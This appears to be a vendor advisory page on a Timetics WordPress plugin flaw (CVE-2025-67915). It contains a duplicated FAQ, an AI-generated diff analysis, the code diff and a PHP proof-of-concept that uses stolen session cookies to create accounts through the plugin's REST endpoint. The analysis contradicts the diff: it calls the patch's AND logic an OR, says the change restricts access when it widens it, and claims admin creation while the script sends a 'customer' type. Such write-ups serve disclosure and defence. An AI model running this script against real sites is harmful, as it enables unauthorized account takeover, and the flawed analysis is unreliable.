What is CVE-2025-67915?

CVE-2025-67915 is a medium severity vulnerability in the Timetics WordPress appointment booking plugin, allowing authenticated users with Timetics Customer-level access to create arbitrary user accounts due to an insufficient capability check in the plugin’s API.

How does the vulnerability work?

The vulnerability arises from an incorrect authorization logic in the `create_customer()` function, which only checks for the `manage_timetics` capability. This allows any authenticated user with the Timetics Customer role to bypass authorization and create new user accounts.

Who is affected by this vulnerability?

All installations of the Timetics plugin up to and including version 1.0.46 are affected. Users with Timetics Customer-level access or higher can exploit this vulnerability to create unauthorized user accounts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Timetics plugin installed. If it is version 1.0.46 or earlier, your site is susceptible to this vulnerability. Additionally, review user roles to identify if any users have Timetics Customer-level access.

How can I fix CVE-2025-67915?

The vulnerability is patched in version 1.0.48 of the Timetics plugin. Update your plugin to this version or later to mitigate the risk associated with this vulnerability.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider temporarily removing or disabling the Timetics plugin to prevent exploitation. Additionally, review user roles and limit access to the Timetics Customer role until the plugin can be updated.

What does a CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while exploitation is possible, it requires authenticated access, which limits the risk to some extent, but it still poses a significant threat if exploited.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to privilege escalation, allowing attackers to create user accounts with arbitrary privileges, including administrative access. This can compromise the integrity of the WordPress site and lead to unauthorized actions.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an authenticated user can send a POST request to the Timetics API to create a new user account without proper authorization checks. It highlights the specific parameters needed and the required authentication cookies.

What steps should I take after patching?

After updating the Timetics plugin, review user roles and permissions to ensure that only authorized users have access to sensitive functionalities. Regularly audit your plugins for vulnerabilities and keep them updated.

Are there any other known vulnerabilities in Timetics?

As of the latest information, CVE-2025-67915 is the primary vulnerability reported. However, it is advisable to monitor security advisories for any new vulnerabilities that may be discovered in the Timetics plugin.

Where can I find more information about this vulnerability?

More information about CVE-2025-67915 can be found on the National Vulnerability Database (NVD) and various security research blogs. Additionally, the plugin’s official site may provide updates and security notices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-67915: Timetics <= 1.0.46 – Incorrect Authorization to Authenticated (Timetics Customer+) User Creation (timetics)

CVE ID CVE-2025-67915

Plugin timetics

Severity Medium (CVSS 5.3)

CWE 863

Vulnerable Version 1.0.46

Patched Version 1.0.48

Disclosed January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67915:
This vulnerability is an incorrect authorization flaw in the Timetics WordPress appointment booking plugin. It allows authenticated attackers with Timetics Customer-level access or higher to create arbitrary user accounts. The vulnerability affects all plugin versions up to and including 1.0.46, with a CVSS score of 5.3 (Medium severity).

Atomic Edge research identifies the root cause in the `api-customer.php` file within the plugin’s core customers directory. The `create_customer()` function at line 284 performs an insufficient capability check. The original code only verifies if the current user has the `manage_timetics` capability. This check fails to account for WordPress administrators who typically possess the `manage_options` capability but might not have the specific plugin-managed capability. The vulnerability exists because the authorization logic uses an OR condition incorrectly implemented as a single check.

Exploitation requires an authenticated attacker with Timetics Customer-level permissions or higher. The attacker sends a POST request to the WordPress REST API endpoint `/wp-json/timetics/v1/customers`. The request must include valid WordPress authentication cookies or nonce headers. The payload contains user creation parameters such as `first_name`, `last_name`, `email`, and `password`. Since the endpoint only checks for `manage_timetics` capability, any user with the Timetics Customer role can bypass authorization and create new user accounts with arbitrary privileges.

The patch modifies line 284 in `timetics/core/customers/api-customer.php`. The fix changes the capability check from `! current_user_can( ‘manage_timetics’ )` to `! current_user_can( ‘manage_timetics’ ) && ! current_user_can( ‘manage_options’ )`. This correction implements proper logical AND conditions requiring users to possess either the plugin-specific `manage_timetics` capability OR the WordPress administrator `manage_options` capability. The patch ensures only administrators with proper privileges can create customer accounts through this endpoint.

Successful exploitation enables privilege escalation through arbitrary user creation. Attackers can create administrator accounts, compromise site integrity, and gain full control over the WordPress installation. The vulnerability violates the principle of least privilege by allowing lower-privileged users to perform administrative actions. Atomic Edge analysis confirms this creates a direct path from authenticated customer access to complete site compromise.

Differential between vulnerable and patched code

Code Diff

--- a/timetics/bootstrap.php
+++ b/timetics/bootstrap.php
@@ -228,6 +228,7 @@
         // Register scripts and styles first
         if ( $this->is_request( 'admin' ) ) {
             add_action( 'admin_enqueue_scripts', [ $this, 'admin_scripts' ] );
+            add_action( 'admin_footer', [ $this, 'admin_helpscout_beacon' ] );
         }

         if ( $this->is_request( 'frontend' ) ) {
@@ -444,7 +445,7 @@
 		WpmetLibsBanner::instance('timetics')
 			->is_test(true)
 			->set_filter(ltrim($filter_string, ','))
-			->set_api_url('https://product.themewinter.com/auth/public/jhanda')
+			->set_api_url('https://banner.themefunction.com/public/jhanda')
 			->set_plugin_screens('timetics')
 			->set_plugin_screens('toplevel_page_timetics')
  			->call();
@@ -452,6 +453,45 @@
 		// $this->handle_get_help_and_upgrade_menu();
 	}

+	/**
+	 * Add HelpScout script to admin footer
+	 *
+	 * @return  void
+	 */
+	public function admin_helpscout_beacon() {
+		$screen = function_exists( 'get_current_screen' ) ? get_current_screen() : null;
+		$is_timetics_screen = false;
+
+		if ( $screen ) {
+			$screen_id = isset( $screen->id ) ? $screen->id : '';
+
+			// Check: only load on Timetics top-level admin page
+			if ( 'toplevel_page_timetics' === $screen_id ) {
+				$is_timetics_screen = true;
+			}
+		}
+
+		// Allow overriding detection via filter.
+		$is_timetics_screen = apply_filters( 'timetics_is_admin_screen', $is_timetics_screen, $screen );
+
+		if ( ! $is_timetics_screen ) {
+			return;
+		}
+		?>
+		<script type="text/javascript">!function(e,t,n){function a(){var e=t.getElementsByTagName("script")[0],n=t.createElement("script");n.type="text/javascript",n.async=!0,n.src="https://beacon-v2.helpscout.net",e.parentNode.insertBefore(n,e)}if(e.Beacon=n=function(t,n,a){e.Beacon.readyQueue.push({method:t,options:n,data:a})},n.readyQueue=[],"complete"===t.readyState)a();else if(e.attachEvent)e.attachEvent("onload",a);else e.addEventListener("load",a,!1)}(window,document,window.Beacon||function(){});</script>
+		<script type="text/javascript">
+		window.Beacon('config', {
+			color: "#0060e5",
+		});
+		window.Beacon('init', '4be24aa2-ee50-483c-a90c-db4216664d65');
+		window.Beacon('on', 'ready', function(){
+			window.Beacon('show');
+		});
+
+		</script>
+		<?php
+	}
+
 }

 /**
--- a/timetics/core/customers/api-customer.php
+++ b/timetics/core/customers/api-customer.php
@@ -284,7 +284,7 @@
         $nonce = $request->get_header('X-WP-Nonce');

         // Check if user has manage_timetics permission (admin)
-        if ( ! current_user_can( 'manage_timetics' ) ) {
+        if (  ! current_user_can( 'manage_timetics' ) && ! current_user_can( 'manage_options' )) {
             return false;
         }

--- a/timetics/timetics.php
+++ b/timetics/timetics.php
@@ -4,7 +4,7 @@
  * Plugin Name:       Timetics
  * Plugin URI:        https://arraytics.com/timetics/
  * Description:       Schedule, Appointment and Seat Booking plugin.
- * Version:           1.0.46
+ * Version:           1.0.48
  * Requires at least: 5.2
  * Requires PHP:      7.3
  * Author:            Arraytics
@@ -56,7 +56,7 @@
      * @return string
      */
     public static function get_version() {
-        return '1.0.46';
+        return '1.0.48';
     }

     /**
--- a/timetics/vendor/composer/installed.php
+++ b/timetics/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'arraytics/timetics',
         'pretty_version' => 'dev-develop',
         'version' => 'dev-develop',
-        'reference' => '170fc3065ee9bd466b7327726fdeddf42ee2d207',
+        'reference' => '300375eeaa91c223264dec37c424a8f1bf5f8511',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         'arraytics/timetics' => array(
             'pretty_version' => 'dev-develop',
             'version' => 'dev-develop',
-            'reference' => '170fc3065ee9bd466b7327726fdeddf42ee2d207',
+            'reference' => '300375eeaa91c223264dec37c424a8f1bf5f8511',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67915 - Timetics <= 1.0.46 - Incorrect Authorization to Authenticated (Timetics Customer+) User Creation

<?php
/**
 * Proof of Concept for CVE-2025-67915
 * Requires: Valid WordPress authentication cookies for a user with Timetics Customer role
 * Target: WordPress site with Timetics plugin <= 1.0.46 installed
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS
$email = 'attacker@example.com'; // CHANGE THIS
$password = 'P@ssw0rd123'; // CHANGE THIS

// WordPress authentication cookies (obtain via browser developer tools)
$cookies = [
    'wordpress_logged_in_xxxx' => 'your_cookie_value_here', // CHANGE THIS
    'wordpress_sec_xxxx' => 'your_secure_cookie_value_here' // CHANGE THIS
];

// Build cookie header
$cookie_header = '';
foreach ($cookies as $name => $value) {
    $cookie_header .= $name . '=' . $value . '; ';
}
$cookie_header = rtrim($cookie_header, '; ');

// REST API endpoint for customer creation
$api_endpoint = $target_url . '/wp-json/timetics/v1/customers';

// Malicious payload to create new user
$payload = [
    'first_name' => 'Atomic',
    'last_name' => 'Edge',
    'email' => $email,
    'password' => $password,
    'confirm_password' => $password,
    'type' => 'customer'
];

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $api_endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Cookie: ' . $cookie_header,
    'X-WP-Nonce: ' . ($_GET['nonce'] ?? '') // Optional nonce parameter
]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Display results
if ($http_code === 200 || $http_code === 201) {
    echo "[SUCCESS] User created successfully!n";
    echo "Response: " . $response . "n";
    echo "New user credentials: " . $email . " / " . $password . "n";
} else {
    echo "[FAILED] HTTP Code: " . $http_code . "n";
    echo "Response: " . $response . "n";
    echo "Possible reasons: Plugin not vulnerable, invalid cookies, or site patched.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-67915?
Overview of the vulnerability
CVE-2025-67915 is a medium severity vulnerability in the Timetics WordPress appointment booking plugin, allowing authenticated users with Timetics Customer-level access to create arbitrary user accounts due to an insufficient capability check in the plugin’s API.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from an incorrect authorization logic in the `create_customer()` function, which only checks for the `manage_timetics` capability. This allows any authenticated user with the Timetics Customer role to bypass authorization and create new user accounts.
Who is affected by this vulnerability?
Identifying vulnerable installations
All installations of the Timetics plugin up to and including version 1.0.46 are affected. Users with Timetics Customer-level access or higher can exploit this vulnerability to create unauthorized user accounts.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Timetics plugin installed. If it is version 1.0.46 or earlier, your site is susceptible to this vulnerability. Additionally, review user roles to identify if any users have Timetics Customer-level access.
How can I fix CVE-2025-67915?
Updating the plugin
The vulnerability is patched in version 1.0.48 of the Timetics plugin. Update your plugin to this version or later to mitigate the risk associated with this vulnerability.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider temporarily removing or disabling the Timetics plugin to prevent exploitation. Additionally, review user roles and limit access to the Timetics Customer role until the plugin can be updated.
What does a CVSS score of 5.3 mean?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while exploitation is possible, it requires authenticated access, which limits the risk to some extent, but it still poses a significant threat if exploited.
What are the practical risks of this vulnerability?
Potential impact on site security
Exploitation of this vulnerability can lead to privilege escalation, allowing attackers to create user accounts with arbitrary privileges, including administrative access. This can compromise the integrity of the WordPress site and lead to unauthorized actions.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided shows how an authenticated user can send a POST request to the Timetics API to create a new user account without proper authorization checks. It highlights the specific parameters needed and the required authentication cookies.
What steps should I take after patching?
Post-update best practices
After updating the Timetics plugin, review user roles and permissions to ensure that only authorized users have access to sensitive functionalities. Regularly audit your plugins for vulnerabilities and keep them updated.
Are there any other known vulnerabilities in Timetics?
Checking for additional risks
As of the latest information, CVE-2025-67915 is the primary vulnerability reported. However, it is advisable to monitor security advisories for any new vulnerabilities that may be discovered in the Timetics plugin.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-67915 can be found on the National Vulnerability Database (NVD) and various security research blogs. Additionally, the plugin’s official site may provide updates and security notices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations